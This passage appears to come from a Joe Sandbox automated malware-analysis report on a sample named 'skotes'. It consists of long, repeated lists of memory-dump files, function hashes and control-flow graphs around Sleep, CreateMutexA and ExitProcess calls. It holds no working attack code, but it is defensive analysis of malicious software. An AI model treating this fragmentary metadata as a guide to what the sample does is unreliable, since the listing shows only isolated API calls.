                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                        • Opcode ID: 1768b5382edcc15def7efcb9770d486636d0c67427f2661c21325699ae2ba90c
                                                                                                                                                                                                        • Instruction ID: c859a33e2e2f5494af5adbf3b803e96215c17cdff050d2a9a7bd3ef9dddbeb3a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1768b5382edcc15def7efcb9770d486636d0c67427f2661c21325699ae2ba90c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2E0EC3014124CAECE257B98DC19A6C7F6EFF91759F148814FA185A336CB25DD82CB81

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 04a8e90f6b2ac82f44211c21f896ef0b8cded89a21c2b69000a8045bbf8ffbad
                                                                                                                                                                                                        • Instruction ID: 7521158675f2ae41f4ec79a57bba36f2416eb9047c3196f1ab6a0dd78b2bba47
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04a8e90f6b2ac82f44211c21f896ef0b8cded89a21c2b69000a8045bbf8ffbad
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37314A31F402059BEF08DB78DC8DBAEB766EBD6314F20861DE058A73D5C77989818B52

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 22 9c9f44-9c9f64 26 9c9f66-9c9f72 22->26 27 9c9f92-9c9fae 22->27 30 9c9f88-9c9f8f call 9dd663 26->30 31 9c9f74-9c9f82 26->31 28 9c9fdc-9c9ffb 27->28 29 9c9fb0-9c9fbc 27->29 36 9c9ffd-9ca009 28->36 37 9ca029-9ca916 call 9d80c0 28->37 34 9c9fbe-9c9fcc 29->34 35 9c9fd2-9c9fd9 call 9dd663 29->35 30->27 31->30 32 9ca92b 31->32 39 9ca953-9ca994 Sleep CreateMutexA 32->39 40 9ca92b call 9f6c6a 32->40 34->32 34->35 35->28 43 9ca01f-9ca026 call 9dd663 36->43 44 9ca00b-9ca019 36->44 51 9ca996-9ca998 39->51 52 9ca9a7-9ca9a8 39->52 40->39 43->37 44->32 44->43 51->52 54 9ca99a-9ca9a5 51->54 54->52
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 828e5fe23eafec3cde5195a62c6fb480be991fa428396cf56ffab2c17a71c5bc
                                                                                                                                                                                                        • Instruction ID: 5b23acfb14f6387502ce4caa83575f35b0bcc558863315efaa2bf1f553c86096
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 828e5fe23eafec3cde5195a62c6fb480be991fa428396cf56ffab2c17a71c5bc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39310731B042099BEB1CDB68D88DBADB766EBC6314F248A1DE018E72D5C77989808753

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 56 9ca079-9ca099 60 9ca09b-9ca0a7 56->60 61 9ca0c7-9ca0e3 56->61 62 9ca0bd-9ca0c4 call 9dd663 60->62 63 9ca0a9-9ca0b7 60->63 64 9ca0e5-9ca0f1 61->64 65 9ca111-9ca130 61->65 62->61 63->62 70 9ca930 63->70 66 9ca107-9ca10e call 9dd663 64->66 67 9ca0f3-9ca101 64->67 68 9ca15e-9ca916 call 9d80c0 65->68 69 9ca132-9ca13e 65->69 66->65 67->66 67->70 73 9ca154-9ca15b call 9dd663 69->73 74 9ca140-9ca14e 69->74 77 9ca953-9ca994 Sleep CreateMutexA 70->77 78 9ca930 call 9f6c6a 70->78 73->68 74->70 74->73 85 9ca996-9ca998 77->85 86 9ca9a7-9ca9a8 77->86 78->77 85->86 88 9ca99a-9ca9a5 85->88 88->86
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
